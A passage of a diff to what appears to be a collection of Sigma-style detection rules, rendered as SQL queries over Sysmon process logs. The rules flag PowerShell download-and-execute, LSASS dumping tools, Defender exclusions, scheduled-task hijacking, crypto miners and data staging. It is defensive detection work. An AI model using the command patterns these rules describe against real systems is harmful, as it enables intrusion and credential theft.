/s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND Image LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" + "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" }, { - "title": "PowerShell Web Download and Execution", - "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", - "status": "experimental", - "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "title": "HackTool - SecurityXploded Execution", + "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "status": "stable", + "description": "Detects the execution of SecurityXploded Tools", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1555" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Company = 'SecurityXploded' OR Image LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_hktl_secutyxploded.yml" + }, + { + "title": "Suspicious Modification Of Scheduled Tasks", + "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "status": "experimental", + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order 
to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1053.005" ], "falsepositives": [ - "Scripts or tools that download files and execute them" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE 
'\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_download_iex.yml" + "filename": "proc_creation_win_schtasks_change.yml" }, { - "title": "PUA - DIT Snapshot Viewer", - "id": "d3b70aad-097e-409c-9df2-450f80dc476b", + "title": "Non-privileged Usage of Reg or Powershell", + "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", "status": "test", - "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", - "author": "Furkan Caliskan (@caliskanfurkan_)", + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate admin usage" + "Unknown" ], "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_ditsnap.yml" + "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" }, { - "title": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE", - "id": "48917adc-a28e-4f5d-b729-11e75da8941f", + "title": "DllUnregisterServer Function Call Via Msiexec.EXE", + "id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. 
Qbot has been seen using this technique to add exlcusions for folders within AppData and ProgramData.", + "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.007" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Paths%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Paths%' ESCAPE '\\') AND CommandLine LIKE '%ADD %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD %' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND (CommandLine LIKE '% /z %' ESCAPE '\\' OR CommandLine LIKE '% -z %' ESCAPE '\\') AND CommandLine LIKE '%.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_defender_exclusion.yml" + "filename": "proc_creation_win_msiexec_dll.yml" }, { - "title": "Griffon Malware Attack Pattern", - "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", - "status": "experimental", - "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Outlook Child Process", + "id": "208748f7-881d-47ac-a29c-07ea84bf691d", + "status": "test", + "description": "Detects a suspicious process spawning from an Outlook process.", + "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, 
Elastic, FPT.EagleEye Team", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1204.002" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + }, + { + "title": "Winnti Malware HK University Campaign", + "id": "3121461b-5aa0-4a41-b910-66d25524edbb", + "status": "test", + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "author": "Florian Roth (Nextron Systems), Markus Neis", + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE 
'%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentImage LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND Image LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Test.exe' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND Image LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_griffon_patterns.yml" + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" }, { - "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", - "id": "0d5675be-bc88-4172-86d3-1e96a4476536", + "title": "PUA - CsExec Execution", + "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", "status": "experimental", - "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" + "attack.resource_development", + "attack.t1587.001", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% 
add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" ], - "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" + "filename": "proc_creation_win_pua_csexec.yml" }, { - "title": "Custom Class Execution via Xwizard", - "id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "title": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", + "id": "9fbf5927-5261-4284-a71d-f681029ea574", "status": "test", - "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate activity is expected since compressing files with a password is common." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND CommandLine REGEXP '\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND CommandLine LIKE '% -p%' ESCAPE '\\' AND (CommandLine LIKE '% a %' ESCAPE '\\' OR CommandLine LIKE '% u %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml" + "filename": "proc_creation_win_7zip_password_compression.yml" }, { - "title": "Gzip Archive Decode Via PowerShell", - "id": "98767d61-b2e8-4d71-b661-e36783ee24c1", + "title": "Potential Product Reconnaissance Via Wmic.EXE", + "id": "15434e33-5027-4914-88d5-3d4145ec25a9", "status": "experimental", - "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", - "author": "Hieu Tran", + "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", + "author": "Nasreddine Bencherchali", + "tags": [ + "attack.execution", + "attack.t1047" + ], "falsepositives": [ - "Legitimate administrative scripts may use this functionality. 
Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%GZipStream%' ESCAPE '\\' AND CommandLine LIKE '%::Decompress%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%Product%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_decode_gzip.yml" + "filename": "proc_creation_win_wmic_recon_product.yml" }, { - "title": "Detect Virtualbox Driver Installation OR Starting Of VMs", - "id": "bab049ca-7471-4828-9024-38279a4c04da", + "title": "Gpresult Display Group Policy Information", + "id": "e56d3073-83ff-4021-90fe-c658e0709e72", "status": "experimental", - "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. 
This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", - "author": "Janantha Marasinghe", + "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.006", - "attack.t1564" + "attack.discovery", + "attack.t1615" ], "falsepositives": [ - "This may have false positives on hosts where Virtualbox is legitimately being used for operations" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%VBoxRT.dll,RTR3Init%' ESCAPE '\\' OR CommandLine LIKE '%VBoxC.dll%' ESCAPE '\\' OR CommandLine LIKE '%VBoxDrv.sys%' ESCAPE '\\') OR (CommandLine LIKE '%startvm%' ESCAPE '\\' OR CommandLine LIKE '%controlvm%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\gpresult.exe' ESCAPE '\\' AND (CommandLine LIKE '%/z%' ESCAPE '\\' OR CommandLine LIKE '%/v%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_virtualbox_execution.yml" + "filename": "proc_creation_win_gpresult_execution.yml" }, { - "title": "Suspicious Parent of Csc.exe", - "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", - "status": "test", - "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "title": "Potential Crypto Mining Activity", + "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", + "status": "stable", + "description": "Detects command line parameters or strings often used by crypto miners", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + 
"Legitimate use of crypto miners", + "Some build frameworks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_csc_susp_parent.yml" + "filename": "proc_creation_win_susp_crypto_mining_monero.yml" }, { - "title": "HackTool - CreateMiniDump Execution", - "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", "status": "test", - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "description": "Detects Winword 
starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_createminidump.yml" + "filename": "proc_creation_win_exploit_cve_2017_8759.yml" }, { - "title": "LOLBIN Execution Of The FTP.EXE Binary", - "id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "title": "WSF/JSE/JS/VBA/VBE File Execution", + "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", "status": "test", - "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", - "author": "Victor Sergeev, oscd.community", + "description": "Detects suspicious file execution by wscript and cscript", + "author": "Michael Haag", "tags": [ "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ - "Unknown" + "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ftp.exe' ESCAPE '\\' OR ((Image LIKE '%\\\\ftp.exe' ESCAPE '\\' OR OriginalFileName = 'ftp.exe') AND CommandLine LIKE '%-s:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('wscript.exe', 'cscript.exe') OR (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ftp.yml" + "filename": "proc_creation_win_script_execution.yml" }, { - "title": "Suspicious GrpConv Execution", - "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", - "status": "experimental", - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Tap Installer Execution", + "id": "99793437-3e16-439b-be0f-078782cf953d", + "status": "test", + "description": "Well-known TAP software installation. 
Possible preparation for data exfiltration using tunneling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unknown" + "Legitimate OpenVPN TAP insntallation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\tapinstall.exe' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\OpenVPN Connect\\\\drivers\\\\tap\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Proton Technologies\\\\ProtonVPNTap\\\\installer\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml" + "filename": "proc_creation_win_tapinstall_execution.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile", - "id": "4cbef972-f347-4170-b62a-8253f6168e6d", + "title": "Renamed Remote Utilities RAT (RURAT) Execution", + "id": "9ef27c24-4903-4192-881a-3adde7ff92a5", "status": "experimental", - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.collection", + "attack.command_and_control", + "attack.discovery", + "attack.s0592" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": 
